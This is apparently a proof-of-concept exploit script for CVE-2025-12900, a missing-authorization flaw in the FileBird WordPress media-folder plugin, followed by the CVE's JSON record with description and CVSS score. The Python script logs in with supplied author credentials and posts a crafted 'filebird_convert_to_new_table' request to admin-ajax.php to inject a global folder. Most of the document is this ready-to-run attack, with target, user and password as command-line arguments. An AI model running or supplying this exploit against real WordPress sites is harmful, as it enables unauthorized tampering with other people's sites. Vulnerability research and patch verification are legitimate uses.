CVE-2025-12900

import requests import sys # CVE-2025-12900 PoC - FileBird Authorization Bypass # Target: WordPress site with FileBird plugin <= 6.5.1 def exploit_filebird(target_url, username, password): """ Exploit missing authorization in FileBird plugin Allows authenticated users to inject global folders and reassign arbitrary media attachments """ session = requests.Session() # Step 1: Login to WordPress as author user login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } resp = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful") # Step 2: Exploit ConvertController::insertToNewTable exploit_url = f"{target_url}/wp-admin/admin-ajax.php" # Inject malicious folder data exploit_data = { 'action': 'filebird_convert_to_new_table', 'key': 'malicious_folder_id', # Unvalidated user input 'folder_name': 'Injected Global Folder', 'parent': 0, 'type': 'global' # Create as global folder } resp = session.post(exploit_url, data=exploit_data) if resp.status_code == 200: print("[+] Folder injection successful") print(f"[+] Response: {resp.text}") else: print("[-] Exploitation failed") return True if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_filebird(target, user, pwd)

{"cve": {"id": "CVE-2025-12900", "sourceIdentifier": "[email protected]", "published": "2025-12-15T15:15:47.860", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The FileBird – WordPress Media Library Folders & File Manager plugin for WordPress is vulnerable to missing authorization in all versions up to, and including, 6.5.1 via the \"ConvertController::insertToNewTable\" function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with author level access and above, to inject global folders and reassign arbitrary media attachments to those folders under certain circumstances."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3411587", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/59592b27-d431-499a-b3c3-3d43a5513c36?source=cve", "source": "[email protected]"}]}}